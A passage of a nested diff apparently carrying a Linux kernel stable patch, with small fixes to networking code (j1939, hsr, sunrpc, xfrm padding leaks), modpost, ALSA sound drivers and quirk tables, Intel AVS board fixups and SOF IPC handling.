+@@ -1140,6 +1138,9 @@ static void j1939_session_cancel(struct j1939_session *session,
+ 	}
+ 
+ 	j1939_session_list_unlock(session->priv);
++
++	if (!session->sk)
++		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static enum hrtimer_restart j1939_tp_txtimer(struct hrtimer *hrtimer)
+@@ -1253,6 +1254,9 @@ static enum hrtimer_restart j1939_tp_rxtimer(struct hrtimer *hrtimer)
+ 			__j1939_session_cancel(session, J1939_XTP_ABORT_TIMEOUT);
+ 		}
+ 		j1939_session_list_unlock(session->priv);
++
++		if (!session->sk)
++			j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ 	}
+ 
+ 	j1939_session_put(session);
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 39a6088080e93..a16f0445023aa 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -422,7 +422,7 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 	node_dst = find_node_by_addr_A(&port->hsr->node_db,
+ 				       eth_hdr(skb)->h_dest);
+ 	if (!node_dst) {
+-		if (net_ratelimit())
++		if (port->hsr->prot_version != PRP_V1 && net_ratelimit())
+ 			netdev_err(skb->dev, "%s: Unknown node\n", __func__);
+ 		return;
+ 	}
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index b3ab6d9d752ea..05aa32696e7c2 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -2153,6 +2153,7 @@ static void xs_tcp_shutdown(struct rpc_xprt *xprt)
+ 	switch (skst) {
+ 	case TCP_FIN_WAIT1:
+ 	case TCP_FIN_WAIT2:
++	case TCP_LAST_ACK:
+ 		break;
+ 	case TCP_ESTABLISHED:
+ 	case TCP_CLOSE_WAIT:
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index e73f9efc54c12..83f35ecacf24f 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -997,7 +997,9 @@ static int copy_to_user_aead(struct xfrm_algo_aead *aead, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, aead, sizeof(*aead));
++	strscpy_pad(ap->alg_name, aead->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = aead->alg_key_len;
++	ap->alg_icv_len = aead->alg_icv_len;
+ 
+ 	if (redact_secret && aead->alg_key_len)
+ 		memset(ap->alg_key, 0, (aead->alg_key_len + 7) / 8);
+@@ -1017,7 +1019,8 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 		return -EMSGSIZE;
+ 
+ 	ap = nla_data(nla);
+-	memcpy(ap, ealg, sizeof(*ealg));
++	strscpy_pad(ap->alg_name, ealg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = ealg->alg_key_len;
+ 
+ 	if (redact_secret && ealg->alg_key_len)
+ 		memset(ap->alg_key, 0, (ealg->alg_key_len + 7) / 8);
+@@ -1028,6 +1031,40 @@ static int copy_to_user_ealg(struct xfrm_algo *ealg, struct sk_buff *skb)
+ 	return 0;
+ }
+ 
++static int copy_to_user_calg(struct xfrm_algo *calg, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ALG_COMP, sizeof(*calg));
++	struct xfrm_algo *ap;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	ap = nla_data(nla);
++	strscpy_pad(ap->alg_name, calg->alg_name, sizeof(ap->alg_name));
++	ap->alg_key_len = 0;
++
++	return 0;
++}
++
++static int copy_to_user_encap(struct xfrm_encap_tmpl *ep, struct sk_buff *skb)
++{
++	struct nlattr *nla = nla_reserve(skb, XFRMA_ENCAP, sizeof(*ep));
++	struct xfrm_encap_tmpl *uep;
++
++	if (!nla)
++		return -EMSGSIZE;
++
++	uep = nla_data(nla);
++	memset(uep, 0, sizeof(*uep));
++
++	uep->encap_type = ep->encap_type;
++	uep->encap_sport = ep->encap_sport;
++	uep->encap_dport = ep->encap_dport;
++	uep->encap_oa = ep->encap_oa;
++
++	return 0;
++}
++
+ static int xfrm_smark_put(struct sk_buff *skb, struct xfrm_mark *m)
+ {
+ 	int ret = 0;
+@@ -1083,12 +1120,12 @@ static int copy_to_user_state_extra(struct xfrm_state *x,
+ 			goto out;
+ 	}
+ 	if (x->calg) {
+-		ret = nla_put(skb, XFRMA_ALG_COMP, sizeof(*(x->calg)), x->calg);
++		ret = copy_to_user_calg(x->calg, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
+ 	if (x->encap) {
+-		ret = nla_put(skb, XFRMA_ENCAP, sizeof(*x->encap), x->encap);
++		ret = copy_to_user_encap(x->encap, skb);
+ 		if (ret)
+ 			goto out;
+ 	}
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index 2c80da0220c32..1dfa80c6b471e 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -1722,7 +1722,7 @@ static void extract_crcs_for_object(const char *object, struct module *mod)
+ 		if (!isdigit(*p))
+ 			continue;	/* skip this line */
+ 
+-		crc = strtol(p, &p, 0);
++		crc = strtoul(p, &p, 0);
+ 		if (*p != '\n')
+ 			continue;	/* skip this line */
+ 
+diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c
+index 8b6aeb8a78f7d..02fd65993e7e5 100644
+--- a/sound/core/pcm_lib.c
++++ b/sound/core/pcm_lib.c
+@@ -2155,6 +2155,8 @@ int pcm_lib_apply_appl_ptr(struct snd_pcm_substream *substream,
+ 		ret = substream->ops->ack(substream);
+ 		if (ret < 0) {
+ 			runtime->control->appl_ptr = old_appl_ptr;
++			if (ret == -EPIPE)
++				__snd_pcm_xrun(substream);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/sound/pci/asihpi/hpi6205.c b/sound/pci/asihpi/hpi6205.c
+index 27e11b5f70b97..c7d7eff86727f 100644
+--- a/sound/pci/asihpi/hpi6205.c
++++ b/sound/pci/asihpi/hpi6205.c
+@@ -430,7 +430,7 @@ void HPI_6205(struct hpi_message *phm, struct hpi_response *phr)
+ 		pao = hpi_find_adapter(phm->adapter_index);
+ 	} else {
+ 		/* subsys messages don't address an adapter */
+-		_HPI_6205(NULL, phm, phr);
++		phr->error = HPI_ERROR_INVALID_OBJ_INDEX;
+ 		return;
+ 	}
+ 
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index acde4cd58785e..099722ebaed83 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -4228,8 +4228,10 @@ static int tuning_ctl_set(struct hda_codec *codec, hda_nid_t nid,
+ 
+ 	for (i = 0; i < TUNING_CTLS_COUNT; i++)
+ 		if (nid == ca0132_tuning_ctls[i].nid)
+-			break;
++			goto found;
+ 
++	return -EINVAL;
++found:
+ 	snd_hda_power_up(codec);
+ 	dspio_set_param(codec, ca0132_tuning_ctls[i].mid, 0x20,
+ 			ca0132_tuning_ctls[i].req,
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 75e1d00074b9f..a889cccdd607c 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -980,7 +980,10 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3905, "Lenovo G50-30", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x390b, "Lenovo G50-80", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3975, "Lenovo U300s", CXT_FIXUP_STEREO_DMIC),
+-	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_PINCFG_LENOVO_NOTEBOOK),
++	/* NOTE: we'd need to extend the quirk for 17aa:3977 as the same
++	 * PCI SSID is used on multiple Lenovo models
++	 */
++	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3978, "Lenovo G50-70", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x397b, "Lenovo S205", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK_VENDOR(0x17aa, "Thinkpad", CXT_FIXUP_THINKPAD_ACPI),
+@@ -1003,6 +1006,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_MUTE_LED_GPIO, .name = "mute-led-gpio" },
+ 	{ .id = CXT_FIXUP_HP_ZBOOK_MUTE_LED, .name = "hp-zbook-mute-led" },
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
++	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 28ac6c159b2a2..070150bbd3559 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2631,6 +2631,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x65e5, "Clevo PC50D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f1, "Clevo PC50HS", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f5, "Clevo PD50PN[NRT]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
++	SND_PCI_QUIRK(0x1558, 0x66a2, "Clevo PE60RNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67d1, "Clevo PB71[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67e1, "Clevo PB71[DE][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67e5, "Clevo PC70D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -2651,6 +2652,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x96e1, "Clevo P960[ER][CDFN]-K", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e1, "Clevo P970[ER][CDFN]", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e2, "Clevo P970RC-M", ALC1220_FIXUP_CLEVO_P950),
++	SND_PCI_QUIRK(0x1558, 0xd502, "Clevo PD50SNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK_VENDOR(0x1558, "Clevo laptop", ALC882_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x161f, 0x2054, "Medion laptop", ALC883_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Y530", ALC882_FIXUP_LENOVO_Y530),
+@@ -9574,6 +9576,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5101, "Clevo S510WU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70f2, "Clevo NH79EPY", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9608,6 +9611,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x971d, "Clevo N970T[CDF]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa500, "Clevo NL5[03]RU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb022, "Clevo NH77D[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9708,6 +9712,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x511e, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x511f, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x9e54, "LENOVO NB", ALC269_FIXUP_LENOVO_EAPD),
++	SND_PCI_QUIRK(0x17aa, 0x9e56, "Lenovo ZhaoYang CF4620Z", ALC286_FIXUP_SONY_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1849, 0x1233, "ASRock NUC Box 1100", ALC233_FIXUP_NO_AUDIO_JACK),
+ 	SND_PCI_QUIRK(0x1849, 0xa233, "Positivo Master C6300", ALC269_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x19e5, 0x3204, "Huawei MACH-WX9", ALC256_FIXUP_HUAWEI_MACH_WX9_PINS),
+diff --git a/sound/pci/ymfpci/ymfpci.c b/sound/pci/ymfpci/ymfpci.c
+index 1e198e4d57b8d..82d4e0fda91be 100644
+--- a/sound/pci/ymfpci/ymfpci.c
++++ b/sound/pci/ymfpci/ymfpci.c
+@@ -170,7 +170,7 @@ static int snd_card_ymfpci_probe(struct pci_dev *pci,
+ 		return -ENOENT;
+ 	}
+ 
+-	err = snd_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
++	err = snd_devm_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
+ 			   sizeof(*chip), &card);
+ 	if (err < 0)
+ 		return err;
+diff --git a/sound/pci/ymfpci/ymfpci_main.c b/sound/pci/ymfpci/ymfpci_main.c
+index c80114c0ad7bf..b492c32ce0704 100644
+--- a/sound/pci/ymfpci/ymfpci_main.c
++++ b/sound/pci/ymfpci/ymfpci_main.c
+@@ -2165,7 +2165,7 @@ static int snd_ymfpci_memalloc(struct snd_ymfpci *chip)
+ 	chip->work_base = ptr;
+ 	chip->work_base_addr = ptr_addr;
+ 	
+-	snd_BUG_ON(ptr + chip->work_size !=
++	snd_BUG_ON(ptr + PAGE_ALIGN(chip->work_size) !=
+ 		   chip->work_ptr->area + chip->work_ptr->bytes);
+ 
+ 	snd_ymfpci_writel(chip, YDSXGR_PLAYCTRLBASE, chip->bank_base_playback_addr);
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 5d1c58df081ac..e5611f655beda 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -241,7 +241,7 @@ enum {
+ 
+ struct tx_mute_work {
+ 	struct tx_macro *tx;
+-	u32 decimator;
++	u8 decimator;
+ 	struct delayed_work dwork;
+ };
+ 
+@@ -634,7 +634,7 @@ exit:
+ 	return 0;
+ }
+ 
+-static bool is_amic_enabled(struct snd_soc_component *component, int decimator)
++static bool is_amic_enabled(struct snd_soc_component *component, u8 decimator)
+ {
+ 	u16 adc_mux_reg, adc_reg, adc_n;
+ 
+@@ -845,7 +845,7 @@ static int tx_macro_enable_dec(struct snd_soc_dapm_widget *w,
+ 			       struct snd_kcontrol *kcontrol, int event)
+ {
+ 	struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm);
+-	unsigned int decimator;
++	u8 decimator;
+ 	u16 tx_vol_ctl_reg, dec_cfg_reg, hpf_gate_reg, tx_gain_ctl_reg;
+ 	u8 hpf_cut_off_freq;
+ 	int hpf_delay = TX_MACRO_DMIC_HPF_DELAY_MS;
+@@ -1060,7 +1060,8 @@ static int tx_macro_hw_params(struct snd_pcm_substream *substream,
+ 			      struct snd_soc_dai *dai)
+ {
+ 	struct snd_soc_component *component = dai->component;
+-	u32 decimator, sample_rate;
++	u32 sample_rate;
++	u8 decimator;
+ 	int tx_fs_rate;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+ 
+@@ -1124,7 +1125,7 @@ static int tx_macro_digital_mute(struct snd_soc_dai *dai, int mute, int stream)
+ {
+ 	struct snd_soc_component *component = dai->component;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+-	u16 decimator;
++	u8 decimator;
+ 
+ 	/* active decimator not set yet */
+ 	if (tx->active_decimator[dai->id] == -1)
+diff --git a/sound/soc/intel/avs/boards/da7219.c b/sound/soc/intel/avs/boards/da7219.c
+index 02ae542ad7792..a63563594b4cd 100644
+--- a/sound/soc/intel/avs/boards/da7219.c
++++ b/sound/soc/intel/avs/boards/da7219.c
+@@ -111,6 +111,26 @@ static int avs_da7219_codec_init(struct snd_soc_pcm_runtime *runtime)
+ 	return 0;
+ }
+ 
++static int
++avs_da7219_be_fixup(struct snd_soc_pcm_runtime *runtime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 24 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S24_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -142,6 +162,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_da7219_be_fixup;
+ 	dl->init = avs_da7219_codec_init;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+diff --git a/sound/soc/intel/avs/boards/max98357a.c b/sound/soc/intel/avs/boards/max98357a.c
+index 921f42caf7e09..183123d08c5a3 100644
+--- a/sound/soc/intel/avs/boards/max98357a.c
++++ b/sound/soc/intel/avs/boards/max98357a.c
+@@ -8,6 +8,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
++#include <sound/pcm_params.h>
+ #include <sound/soc.h>
+ #include <sound/soc-acpi.h>
+ #include <sound/soc-dapm.h>
+@@ -24,6 +25,26 @@ static const struct snd_soc_dapm_route card_base_routes[] = {
+ 	{ "Spk", NULL, "Speaker" },
+ };
+ 
++static int
++avs_max98357a_be_fixup(struct snd_soc_pcm_runtime *runtime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 16 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S16_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -55,6 +76,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_max98357a_be_fixup;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+ 	dl->dpcm_playback = 1;
+diff --git a/sound/soc/intel/avs/boards/nau8825.c b/sound/soc/intel/avs/boards/nau8825.c
+index f76909e9f990a..8392d8fac8f9c 100644
+--- a/sound/soc/intel/avs/boards/nau8825.c
++++ b/sound/soc/intel/avs/boards/nau8825.c
+@@ -33,15 +33,15 @@ avs_nau8825_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *co
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!SND_SOC_DAPM_EVENT_ON(event)) {
++	if (SND_SOC_DAPM_EVENT_ON(event))
++		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
++					     SND_SOC_CLOCK_IN);
++	else
+ 		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0) {
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-			return ret;
+-		}
+-	}
++	if (ret < 0)
++		dev_err(card->dev, "Set sysclk failed: %d\n", ret);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static const struct snd_kcontrol_new card_controls[] = {
+diff --git a/sound/soc/intel/avs/boards/ssm4567.c b/sound/soc/intel/avs/boards/ssm4567.c
+index 9f84c8ab34478..51a8867326b47 100644
+--- a/sound/soc/intel/avs/boards/ssm4567.c
++++ b/sound/soc/intel/avs/boards/ssm4567.c
+@@ -15,7 +15,6 @@
+ #include <sound/soc-acpi.h>
+ #include "../../../codecs/nau8825.h"
+ 
+-#define SKL_NUVOTON_CODEC_DAI	"nau8825-hifi"
+ #define SKL_SSM_CODEC_DAI	"ssm4567-hifi"
+ 
+ static struct snd_soc_codec_conf card_codec_conf[] = {
+@@ -34,41 +33,11 @@ static const struct snd_kcontrol_new card_controls[] = {
+ 	SOC_DAPM_PIN_SWITCH("Right Speaker"),
+ };
+ 
+-static int
+-platform_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *control, int event)
+-{
+-	struct snd_soc_dapm_context *dapm = w->dapm;
+-	struct snd_soc_card *card = dapm->card;
+-	struct snd_soc_dai *codec_dai;
+-	int ret;
+-
+-	codec_dai = snd_soc_card_get_codec_dai(card, SKL_NUVOTON_CODEC_DAI);
+-	if (!codec_dai) {
+-		dev_err(card->dev, "Codec dai not found\n");
+-		return -EINVAL;
+-	}
+-
+-	if (SND_SOC_DAPM_EVENT_ON(event)) {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
+-					     SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	} else {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	}
+-
+-	return ret;
+-}
+-
+ static const struct snd_soc_dapm_widget card_widgets[] = {
+ 	SND_SOC_DAPM_SPK("Left Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("Right Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("DP1", NULL),
+ 	SND_SOC_DAPM_SPK("DP2", NULL),
+-	SND_SOC_DAPM_SUPPLY("Platform Clock", SND_SOC_NOPM, 0, 0, platform_clock_control,
+-			    SND_SOC_DAPM_PRE_PMU | SND_SOC_DAPM_POST_PMD),
+ };
+ 
+ static const struct snd_soc_dapm_route card_base_routes[] = {
+diff --git a/sound/soc/sof/intel/pci-tng.c b/sound/soc/sof/intel/pci-tng.c
+index f0f6d9ba88037..0b17d1bb225e2 100644
+--- a/sound/soc/sof/intel/pci-tng.c
++++ b/sound/soc/sof/intel/pci-tng.c
+@@ -75,11 +75,7 @@ static int tangier_pci_probe(struct snd_sof_dev *sdev)
+ 
+ 	/* LPE base */
+ 	base = pci_resource_start(pci, desc->resindex_lpe_base) - IRAM_OFFSET;
+-	size = pci_resource_len(pci, desc->resindex_lpe_base);
+-	if (size < PCI_BAR_SIZE) {
+-		dev_err(sdev->dev, "error: I/O region is too small.\n");
+-		return -ENODEV;
+-	}
++	size = PCI_BAR_SIZE;
+ 
+ 	dev_dbg(sdev->dev, "LPE PHY base at 0x%x size 0x%x", base, size);
+ 	sdev->bar[DSP_BAR] = devm_ioremap(sdev->dev, base, size);
+diff --git a/sound/soc/sof/ipc3.c b/sound/soc/sof/ipc3.c
+index b28af3a48b707..60b96b0c2412f 100644
+--- a/sound/soc/sof/ipc3.c
++++ b/sound/soc/sof/ipc3.c
+@@ -970,8 +970,9 @@ static void sof_ipc3_rx_msg(struct snd_sof_dev *sdev)
+ 		return;
+ 	}
+ 
+-	if (hdr.size < sizeof(hdr)) {
+-		dev_err(sdev->dev, "The received message size is invalid\n");
++	if (hdr.size < sizeof(hdr) || hdr.size > SOF_IPC_MSG_MAX_SIZE) {
++		dev_err(sdev->dev, "The received message size is invalid: %u\n",
++			hdr.size);
+ 		return;
+ 	}
+ 
+diff --git a/sound/soc/sof/ipc4-control.c b/sound/soc/sof/ipc4-control.c
+index 0d5a578c34962..7442ec1c5a4d4 100644
+--- a/sound/soc/sof/ipc4-control.c
++++ b/sound/soc/sof/ipc4-control.c
+@@ -84,7 +84,8 @@ sof_ipc4_set_volume_data(struct snd_sof_dev *sdev, struct snd_sof_widget *swidge
+ 		}
+ 
+ 		/* set curve type and duration from topology */
+-		data.curve_duration = gain->data.curve_duration;
++		data.curve_duration_l = gain->data.curve_duration_l;
++		data.curve_duration_h = gain->data.curve_duration_h;
+ 		data.curve_type = gain->data.curve_type;
+ 
+ 		msg->data_ptr = &data;
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index a81af5f73a4b4..49289932ba7e6 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -106,7 +106,7 @@ static const struct sof_topology_token gain_tokens[] = {
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, curve_type)},
+ 	{SOF_TKN_GAIN_RAMP_DURATION,
+ 		SND_SOC_TPLG_TUPLE_TYPE_WORD, get_token_u32,
+-		offsetof(struct sof_ipc4_gain_data, curve_duration)},
++		offsetof(struct sof_ipc4_gain_data, curve_duration_l)},
+ 	{SOF_TKN_GAIN_VAL, SND_SOC_TPLG_TUPLE_TYPE_WORD,
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, init_val)},
+ };
+@@ -154,7 +154,7 @@ static void sof_ipc4_dbg_audio_format(struct device *dev,
+ 	for (i = 0; i < num_format; i++, ptr = (u8 *)ptr + object_size) {
+ 		fmt = ptr;
+ 		dev_dbg(dev,
+-			" #%d: %uKHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
++			" #%d: %uHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
+ 			i, fmt->sampling_frequency, fmt->bit_depth, fmt->ch_map,
+ 			fmt->ch_cfg, fmt->interleaving_style, fmt->fmt_cfg);
+ 	}
+@@ -682,7 +682,7 @@ static int sof_ipc4_widget_setup_comp_pga(struct snd_sof_widget *swidget)
+ 
+ 	dev_dbg(scomp->dev,
+ 		"pga widget %s: ramp type: %d, ramp duration %d, initial gain value: %#x, cpc %d\n",
+-		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration,
++		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration_l,
+ 		gain->data.init_val, gain->base_config.cpc);
+ 
+ 	ret = sof_ipc4_widget_setup_msg(swidget, &gain->msg);
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 2363a7cc0b57d..cf9d278524572 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -217,14 +217,16 @@ struct sof_ipc4_control_data {
+  * @init_val: Initial value
+  * @curve_type: Curve type
+  * @reserved: reserved for future use
+- * @curve_duration: Curve duration
++ * @curve_duration_l: Curve duration low part
